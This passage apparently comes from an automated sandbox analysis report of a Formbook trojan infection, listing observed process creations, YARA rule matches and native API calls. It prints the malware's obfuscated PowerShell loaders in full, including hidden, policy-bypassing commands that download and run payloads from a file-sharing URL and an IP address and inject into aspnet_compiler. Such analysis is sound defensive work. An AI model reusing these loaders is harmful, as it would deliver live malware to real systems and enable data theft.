l03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXeJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')"Jump to behavior
                    Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000F.00000002.2565803965.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000D.00000002.2276568583.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000F.00000002.2567334619.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000012.00000002.2573432013.0000000000E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000D.00000002.1849072015.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 8096, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0042C4A3 NtClose,13_2_0042C4A3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011535C0 NtCreateMutant,LdrInitializeThunk,13_2_011535C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152B60 NtClose,LdrInitializeThunk,13_2_01152B60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_01152DF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_01152C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01153010 NtOpenDirectoryObject,13_2_01153010
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01153090 NtSetValueKey,13_2_01153090
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01154340 NtSetContextThread,13_2_01154340
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01154650 NtSuspendThread,13_2_01154650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011539B0 NtGetContextThread,13_2_011539B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152B80 NtQueryInformationFile,13_2_01152B80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152BA0 NtEnumerateValueKey,13_2_01152BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152BF0 NtAllocateVirtualMemory,13_2_01152BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152BE0 NtQueryValueKey,13_2_01152BE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152AB0 NtWaitForSingleObject,13_2_01152AB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152AD0 NtReadFile,13_2_01152AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152AF0 NtWriteFile,13_2_01152AF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152D10 NtMapViewOfSection,13_2_01152D10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01153D10 NtOpenProcessToken,13_2_01153D10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152D00 NtSetInformationFile,13_2_01152D00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152D30 NtUnmapViewOfSection,13_2_01152D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01153D70 NtOpenThread,13_2_01153D70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152DB0 NtEnumerateKey,13_2_01152DB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152DD0 NtDelayExecution,13_2_01152DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152C00 NtQueryInformationProcess,13_2_01152C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152C60 NtCreateKey,13_2_01152C60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152CA0 NtQueryInformationToken,13_2_01152CA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152CC0 NtQueryVirtualMemory,13_2_01152CC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152CF0 NtOpenProcess,13_2_01152CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152F30 NtCreateSection,13_2_01152F30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152F60 NtCreateProcessEx,13_2_01152F60
